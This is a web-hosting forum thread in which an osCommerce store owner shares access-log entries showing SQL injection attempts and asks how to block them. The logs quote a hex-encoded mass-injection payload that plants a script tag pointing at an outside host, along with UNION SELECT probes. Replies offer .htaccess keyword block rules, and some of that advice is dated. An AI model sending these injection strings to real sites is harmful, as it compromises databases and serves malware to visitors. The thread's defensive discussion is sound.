View Full Version : Attack defense

11-05-2008, 09:17 AM

I have some suspicious activities on my web site. This is trying to attack my site with an SQL injection technique. Here is what I have in my access_log: - - [16/Oct/2008:02:50:53 -0600] "GET /product_info.php?pName=product';DeCLARE%20@S%20CHA R(4000);SET%20@S=CAST(0x4445434C415245204054207661 726368617228323535292C40432076617263686172
283430303029204445434C415245205461626C655F43757273 6F7220435552534F5220464F5220736
56C65637420612E6E616D652C622E6E616D652066726F6D207 379736F626A6563747320612C737973
636F6C756D6E73206220776865726520612E69643D622E6964 20616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F7220622E78747 970653D3335206F7220622E78747970
653D323331206F7220622E78747970653D31363729204F5045 4E205461626C655F437572736F72204
645544348204E4558542046524F4D20205461626C655F43757 2736F7220494E544F2040542C404320
5748494C4528404046455443485F5354415455533D30292042 4547494E20657865632827757064617
465205B272B40542B275D20736574205B272B40432B275D3D5 B272B40432B275D2B2727223E3C2F74
69746C653E3C736372697074207372633D22687474703A2F2F 777777332E3830306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3C212D2D272 720776865726520272B40432B27206E
6F74206C696B6520272725223E3C2F7469746C653E3C736372 697074207372633D22687474703A2F2
F777777332E3830306D672E636E2F63737273732F772E6A732 23E3C2F7363726970743E3C212D2D27
2727294645544348204E4558542046524F4D20205461626C65 5F437572736F7220494E544F2040542
C404320454E4420434C4F5345205461626C655F437572736F7 2204445414C4C4F4341544520546162
6C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 8973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705)"
One possible defense is to write a .htaccess rule that fails the request if the GET parameters include a "@" character. The rule that I use is:

RewriteCond %{QUERY_STRING} @ [NC]
RewriteRule ^ - [F]
The rule seems to be working fine. However, I just found that this rewrite rule creates a problem with a normal occurence of @ at my site. I have a survey page, the URL looks like this: http://store.com/survey.php?&email=valid@valid.com&order_num=622. When I enter the link to survey page, I get:

You don't have permission to access /survey.php on this server.
Since an e-mail address does have an @ symbol, that rewrite rule matches and sends a Forbidden page.

Is there any other way I can prevent attack attempts or rewrite the rule, so it won't interfere with my other pages with the normal @ occurences?


11-05-2008, 01:08 PM
The better solution would be to have this filtered by the php page that is being accessed. I would imagine that it already is if you found it on the web some place and the developers keep the security of the program up to date.

The other solution is to block the IP# if it happens to be consistent. You can do the via your Site Manager.

It seems strange that you would want to send the email address via a GET/QUERY_STRING in the survey.php file. Would it not be better to send it via POST?

You might also try:

RewriteCond %{QUERY_STRING} ExEC(@S) [NC]
RewriteRule ^ - [F]


RewriteCond %{QUERY_STRING} DeCLARE%20@S [NC]
RewriteRule ^ - [F]

11-05-2008, 04:41 PM
No, blocking IP is not a solution because it keeps changing every time as well as the automatic requests the scripts send. One time it's DECLARE in the request, next time it might be something else, it's not consistent. - - [05/Nov/2008:09:50:37 -0700] "GET /index.php?sort=-999+AND+1=1+UNION+ALL+SELECT+user(),database(),@@v ersion-- HTTP/1.0" 200 46841 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" - - [05/Nov/2008:09:50:37 -0700] "GET /index.php?sort=-1+AND+1=1+UNION+ALL+SELECT+user(),database(),@@ver sion-- HTTP/1.0" 200 46756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
The survey.php is a part of the osc contribution that I added. I didn't make the code, so I use it as is, and it's working fine.

The Rewrite rules that you mentioned above, what do they mean? Will they match only if there will be either DECLARE or ExEC in requests?


11-06-2008, 07:19 AM
Yes the examples I posted would match to Declare or exec. Actually they would match to ExEC(@S) or DeCLARE%20@S and the match would not be case sensitive.

I did some searching on Google and found this suggestion (http://www.webmasterworld.com/apache/3731562.htm) on the Webmaster Fourms:

RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|in sert|meta|script|select|truncate|update)[^a-z] [NC]
RewriteRule (.*) - [F]
That is a combination of all database commands that you would not want people to pass in a query. That should do what you want. You might want to browse the linked thread over at Webmaster World for other tips on using this condition.

11-06-2008, 12:23 PM
If I use this rule as it is written, I can't work with the database. The functions such as update, delete, drop, insert, may be the others too send me to a Forbidden page. So, it's may be preventing people from accessing the database, but I can't access it either.

11-07-2008, 07:18 AM
Why would you be sending those commands in a query string? I am not aware of any programs that work with the database via the web that would do that.

11-07-2008, 10:26 AM
The osCommerce has store admin that allows to view/edit customers, products, orders, etc. Functions such as update, delete, drop, insert, etc. send me to a Forbidden page with the new RewriteRule.

Unfortunately, I'm not familiar wih the scripts that hackers use to attack the web sites. I'm just seeing hits from different IPs with query strings in requests.

11-07-2008, 03:40 PM
You could remove those from the RewriteCond if you wanted to. I don't really think you need to worry about blocking these request. OsCommerce should be doing that for you when needed.

11-07-2008, 03:49 PM
I don't know if osCommerce blocks these attempts or not and have no way to check it. I just hope that it does. However, I still see from time to time that different scripts are trying to access my database. I don't know if it's something that I need to worry about or not.

11-11-2008, 10:54 PM
If product_info.php is your page, you can (and should) truncate the product name at the apostrophe before taking any action on the user input.

04-19-2010, 05:37 AM
I'm just curious. Why do hackers attack e-commerce sites? Does osCommerce store credit-card numbers in the database? If not, are the hackers after the customer information?

04-19-2010, 06:31 AM
e-commerce programs can store CC information depending on how you have them set up. I personally believe it is better if you do not set your shopping carts to store the CC information if they are on a shared hosting server like we have at WestHost. When I do set folks up with an e-commerce program I encourage them to use a service like PayPal for payment. That way you don't have to store the information on your server.

Hacker often do look for other info like email accounts but they could also be looking for a way to get in the to the server deface the site or use it for email spamming.

12-12-2011, 11:19 AM
did you know that most of the folders and files within the OSCommerce setup can be set to read only? This prevents a hacker from doing much of anything unless you allow it ..

Also, OSCommerce by default does not store CC numbers. If your site stores them, someone changed the default setup.